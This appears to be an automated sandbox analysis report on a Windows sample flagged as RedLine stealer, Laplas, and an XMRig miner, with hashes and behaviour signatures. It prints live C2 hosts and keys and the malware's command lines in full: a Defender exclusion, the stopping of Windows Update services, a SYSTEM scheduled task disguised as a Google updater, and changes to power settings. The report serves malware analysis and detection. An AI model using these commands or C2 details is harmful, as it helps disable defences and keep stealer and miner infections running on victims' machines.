Analysis
-
max time kernel
281s -
max time network
300s -
platform
windows7_x64 -
resource
win7-20230220-en -
resource tags
arch:x64arch:x86image:win7-20230220-enlocale:en-usos:windows7-x64system -
submitted
10-06-2023 04:48
Static task
static1
Behavioral task
behavioral1
Sample
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
Resource
win7-20230220-en
Behavioral task
behavioral2
Sample
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
Resource
win10-20230220-en
General
-
Target
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe
-
Size
1.7MB
-
MD5
a4aab901f5f4662d75a66bdb08971148
-
SHA1
9835bae8776e280b5a6bcf8e204d1bca5e05b0f6
-
SHA256
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c
-
SHA512
a4a86338d24118d20242714da4ac9df72a0954c7c7cfa4be80cb2495b2ced651e328b4fbf1e66ac844f76f838efd591baade7b2dca019917964ac0b7a73c479f
-
SSDEEP
24576:YwJAcH22+6MA333QaUozWal46B7Owg/63wXByw/OK:bJAcH22KA3339UPaewgrByq
Malware Config
Extracted
redline
090623_11_red
goodlogs.neverever.ug:11615
-
auth_value
ca62706abf6895102883ab0c8a86ddff
Extracted
laplas
http://45.159.189.105
-
api_key
f52a5c9bc5eb2f51b22f04f3e85c301ac0170a650de6044773f0a8309fbdfb79
Signatures
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
Suspicious use of NtCreateUserProcessOtherParentProcess 11 IoCs
Processes:
mtaskhost.exeupdater.exedescription pid process target process PID 436 created 1204 436 mtaskhost.exe Explorer.EXE PID 436 created 1204 436 mtaskhost.exe Explorer.EXE PID 436 created 1204 436 mtaskhost.exe Explorer.EXE PID 436 created 1204 436 mtaskhost.exe Explorer.EXE PID 436 created 1204 436 mtaskhost.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE PID 1052 created 1204 1052 updater.exe Explorer.EXE -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 4 IoCs
Processes:
updater.exemtaskhost.execltaskhost.exentlhost.exedescription ioc process Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ updater.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ mtaskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ cltaskhost.exe Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ ntlhost.exe -
XMRig Miner payload 4 IoCs
Processes:
resource yara_rule behavioral1/memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmp xmrig behavioral1/memory/544-177-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/544-180-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig behavioral1/memory/544-184-0x0000000140000000-0x00000001407EF000-memory.dmp xmrig -
Downloads MZ/PE file
-
Drops file in Drivers directory 2 IoCs
Processes:
mtaskhost.exeupdater.exedescription ioc process File created C:\Windows\System32\drivers\etc\hosts mtaskhost.exe File created C:\Windows\System32\drivers\etc\hosts updater.exe -
Stops running service(s) 3 TTPs
-
Checks BIOS information in registry 2 TTPs 8 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
cltaskhost.exentlhost.exeupdater.exemtaskhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion cltaskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion cltaskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion ntlhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion updater.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion mtaskhost.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion mtaskhost.exe -
Executes dropped EXE 4 IoCs
Processes:
mtaskhost.execltaskhost.exentlhost.exeupdater.exepid process 436 mtaskhost.exe 1644 cltaskhost.exe 1996 ntlhost.exe 1052 updater.exe -
Loads dropped DLL 4 IoCs
Processes:
jsc.execltaskhost.exetaskeng.exepid process 1984 jsc.exe 1984 jsc.exe 1644 cltaskhost.exe 1532 taskeng.exe -
Processes:
resource yara_rule \Users\Admin\AppData\Local\Temp\mtaskhost.exe themida C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe themida behavioral1/memory/436-70-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-72-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-73-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-75-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-76-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-81-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-89-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-116-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-119-0x000000013FA70000-0x000000014086B000-memory.dmp themida behavioral1/memory/436-122-0x000000013FA70000-0x000000014086B000-memory.dmp themida C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe themida behavioral1/memory/436-137-0x000000013FA70000-0x000000014086B000-memory.dmp themida \Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1052-142-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-143-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-144-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-145-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-146-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-147-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-148-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-150-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-154-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-161-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida behavioral1/memory/1052-167-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida C:\Program Files\Google\Chrome\updater.exe themida behavioral1/memory/1052-173-0x000000013FD40000-0x0000000140B3B000-memory.dmp themida -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
cltaskhost.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-3430344531-3702557399-3004411149-1000\Software\Microsoft\Windows\CurrentVersion\Run\NTSystem = "C:\\Users\\Admin\\AppData\\Roaming\\NTSystem\\ntlhost.exe" cltaskhost.exe -
Processes:
updater.exemtaskhost.execltaskhost.exentlhost.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA updater.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA mtaskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA cltaskhost.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA ntlhost.exe -
Drops file in System32 directory 4 IoCs
Processes:
powershell.exepowershell.exepowershell.exepowershell.exedescription ioc process File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 4 IoCs
Processes:
mtaskhost.execltaskhost.exentlhost.exeupdater.exepid process 436 mtaskhost.exe 1644 cltaskhost.exe 1996 ntlhost.exe 1052 updater.exe -
Suspicious use of SetThreadContext 3 IoCs
Processes:
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exeupdater.exedescription pid process target process PID 1344 set thread context of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1052 set thread context of 1524 1052 updater.exe conhost.exe PID 1052 set thread context of 544 1052 updater.exe explorer.exe -
Drops file in Program Files directory 2 IoCs
Processes:
mtaskhost.exeupdater.exedescription ioc process File created C:\Program Files\Google\Chrome\updater.exe mtaskhost.exe File created C:\Program Files\Google\Libs\WR64.sys updater.exe -
Launches sc.exe 10 IoCs
Sc.exe is a Windows utlilty to control services on the system.
Processes:
sc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exesc.exepid process 1124 sc.exe 1628 sc.exe 1552 sc.exe 1384 sc.exe 792 sc.exe 1552 sc.exe 752 sc.exe 1944 sc.exe 980 sc.exe 852 sc.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeschtasks.exepid process 1364 schtasks.exe 1312 schtasks.exe -
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.
Processes:
description flow ioc HTTP User-Agent header 9 Go-http-client/1.1 -
Modifies data under HKEY_USERS 2 IoCs
Processes:
powershell.exedescription ioc process Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage\StartMenu_Start_Time = f08fd10d579bd901 powershell.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
jsc.exemtaskhost.exepowershell.exepowershell.exeupdater.exepowershell.exepowershell.exeexplorer.exepid process 1984 jsc.exe 1984 jsc.exe 436 mtaskhost.exe 436 mtaskhost.exe 1740 powershell.exe 436 mtaskhost.exe 436 mtaskhost.exe 436 mtaskhost.exe 436 mtaskhost.exe 436 mtaskhost.exe 436 mtaskhost.exe 1480 powershell.exe 436 mtaskhost.exe 436 mtaskhost.exe 1052 updater.exe 1052 updater.exe 292 powershell.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 2024 powershell.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 1052 updater.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe 544 explorer.exe -
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
pid process 464 -
Suspicious use of AdjustPrivilegeToken 16 IoCs
Processes:
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exejsc.exepowershell.exepowercfg.exepowershell.exeschtasks.exepowercfg.exepowercfg.exepowershell.exepowercfg.exepowercfg.exepowercfg.exepowershell.exepowercfg.exeupdater.exeexplorer.exedescription pid process Token: SeDebugPrivilege 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe Token: SeDebugPrivilege 1984 jsc.exe Token: SeDebugPrivilege 1740 powershell.exe Token: SeShutdownPrivilege 268 powercfg.exe Token: SeDebugPrivilege 1480 powershell.exe Token: SeShutdownPrivilege 1312 schtasks.exe Token: SeShutdownPrivilege 300 powercfg.exe Token: SeShutdownPrivilege 1984 powercfg.exe Token: SeDebugPrivilege 292 powershell.exe Token: SeShutdownPrivilege 996 powercfg.exe Token: SeShutdownPrivilege 588 powercfg.exe Token: SeShutdownPrivilege 1804 powercfg.exe Token: SeDebugPrivilege 2024 powershell.exe Token: SeShutdownPrivilege 1920 powercfg.exe Token: SeDebugPrivilege 1052 updater.exe Token: SeLockMemoryPrivilege 544 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exejsc.execltaskhost.execmd.execmd.exepowershell.exetaskeng.execmd.exedescription pid process target process PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1344 wrote to memory of 1984 1344 8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe jsc.exe PID 1984 wrote to memory of 436 1984 jsc.exe mtaskhost.exe PID 1984 wrote to memory of 436 1984 jsc.exe mtaskhost.exe PID 1984 wrote to memory of 436 1984 jsc.exe mtaskhost.exe PID 1984 wrote to memory of 436 1984 jsc.exe mtaskhost.exe PID 1984 wrote to memory of 1644 1984 jsc.exe cltaskhost.exe PID 1984 wrote to memory of 1644 1984 jsc.exe cltaskhost.exe PID 1984 wrote to memory of 1644 1984 jsc.exe cltaskhost.exe PID 1984 wrote to memory of 1644 1984 jsc.exe cltaskhost.exe PID 1644 wrote to memory of 1996 1644 cltaskhost.exe ntlhost.exe PID 1644 wrote to memory of 1996 1644 cltaskhost.exe ntlhost.exe PID 1644 wrote to memory of 1996 1644 cltaskhost.exe ntlhost.exe PID 1488 wrote to memory of 1628 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1628 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1628 1488 cmd.exe sc.exe PID 1488 wrote to memory of 752 1488 cmd.exe sc.exe PID 1488 wrote to memory of 752 1488 cmd.exe sc.exe PID 1488 wrote to memory of 752 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1552 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1552 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1552 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1944 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1944 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1944 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1384 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1384 1488 cmd.exe sc.exe PID 1488 wrote to memory of 1384 1488 cmd.exe sc.exe PID 1408 wrote to memory of 268 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 268 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 268 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 1312 1408 cmd.exe schtasks.exe PID 1408 wrote to memory of 1312 1408 cmd.exe schtasks.exe PID 1408 wrote to memory of 1312 1408 cmd.exe schtasks.exe PID 1408 wrote to memory of 300 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 300 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 300 1408 cmd.exe powercfg.exe PID 1480 wrote to memory of 1364 1480 powershell.exe schtasks.exe PID 1480 wrote to memory of 1364 1480 powershell.exe schtasks.exe PID 1480 wrote to memory of 1364 1480 powershell.exe schtasks.exe PID 1408 wrote to memory of 1984 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 1984 1408 cmd.exe powercfg.exe PID 1408 wrote to memory of 1984 1408 cmd.exe powercfg.exe PID 1532 wrote to memory of 1052 1532 taskeng.exe updater.exe PID 1532 wrote to memory of 1052 1532 taskeng.exe updater.exe PID 1532 wrote to memory of 1052 1532 taskeng.exe updater.exe PID 1260 wrote to memory of 980 1260 cmd.exe sc.exe PID 1260 wrote to memory of 980 1260 cmd.exe sc.exe PID 1260 wrote to memory of 980 1260 cmd.exe sc.exe PID 1260 wrote to memory of 792 1260 cmd.exe sc.exe PID 1260 wrote to memory of 792 1260 cmd.exe sc.exe PID 1260 wrote to memory of 792 1260 cmd.exe sc.exe PID 1260 wrote to memory of 852 1260 cmd.exe sc.exe PID 1260 wrote to memory of 852 1260 cmd.exe sc.exe PID 1260 wrote to memory of 852 1260 cmd.exe sc.exe PID 1260 wrote to memory of 1124 1260 cmd.exe sc.exe PID 1260 wrote to memory of 1124 1260 cmd.exe sc.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe"C:\Users\Admin\AppData\Local\Temp\8eb56a2f631dd8b6e3cf827e2022dd3714b805eb377d4e186a41384ec624376c.exe"2⤵
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe"3⤵
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe"C:\Users\Admin\AppData\Local\Temp\mtaskhost.exe"4⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Local\Temp\cltaskhost.exe"C:\Users\Admin\AppData\Local\Temp\cltaskhost.exe"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Loads dropped DLL
- Adds Run key to start application
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exeC:\Users\Admin\AppData\Roaming\NTSystem\ntlhost.exe5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 03⤵
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 03⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\schtasks.exeC:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"2⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force2⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\sc.exesc stop UsoSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop WaaSMedicSvc3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop wuauserv3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop bits3⤵
- Launches sc.exe
-
C:\Windows\System32\sc.exesc stop dosvc3⤵
- Launches sc.exe
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#fyhjjuwy#> IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'GoogleUpdateTaskMachineQC' /tr '''C:\Program Files\Google\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Google\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'GoogleUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; }2⤵
- Drops file in System32 directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\schtasks.exe"C:\Windows\system32\schtasks.exe" /create /f /sc onlogon /rl highest /ru System /tn GoogleUpdateTaskMachineQC /tr "'C:\Program Files\Google\Chrome\updater.exe'"3⤵
- Creates scheduled task(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exeC:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 02⤵
-
C:\Windows\System32\conhost.exeC:\Windows\System32\conhost.exe2⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\taskeng.exetaskeng.exe {D5B2E0EA-07A8-42F0-9255-8439E5509F5E} S-1-5-18:NT AUTHORITY\System:Service:1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Program Files\Google\Chrome\updater.exe"C:\Program Files\Google\Chrome\updater.exe"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Drops file in Drivers directory
- Checks BIOS information in registry
- Executes dropped EXE
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -hibernate-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-dc 01⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exepowercfg /x -standby-timeout-ac 01⤵
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Program Files\Google\Chrome\updater.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
C:\Program Files\Google\Chrome\updater.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
C:\Program Files\Google\Chrome\updater.exeFilesize
10.8MB
MD56e39a59c8f6c3f52f122f80fb0933c9f
SHA1cb1e56e022de8660579a5812b97303529bdca5d5
SHA25617f1d39417de8a58e1c64a84aa10499cc0462748a47d3e82f358f97ef536a671
SHA512219edd14a795a375220370858f4bfefa2e83fe0a57d90a56097486883b925383567c6c3159c8c312305ae06641d632c8cbef7e823d228efdf3abb912bbdd21cf
-
C:\Users\Admin\AppData\Local\Temp\cltaskhost.exeFilesize
3.4MB
MD550859caa45e9d02823ae55b69fd7b645
SHA1aec25ed88cd00fd12a18ca2714d68e33c7fd57c3
SHA2568dbebde20f5c4a1c0d29c9faf1c670423f99306042d428c35d6bdd552d3fb554
SHA51278df0c4c350b92743f4739855a8f605cf245463dde934edb2b8a26a5d6025231c17b8f0bbe2b9bffa4938343bf84ab88f5539282b6f9fbb78ec836d5a735d767
-
C:\Users\Admin\AppData\Local\Temp\cltaskhost.exeFilesize
3.4MB
MD550859caa45e9d02823ae55b69fd7b645
SHA1aec25ed88cd00fd12a18ca2714d68e33c7fd57c3
SHA2568dbebde20f5c4a1c0d29c9faf1c670423f99306042d428c35d6bdd552d3fb554
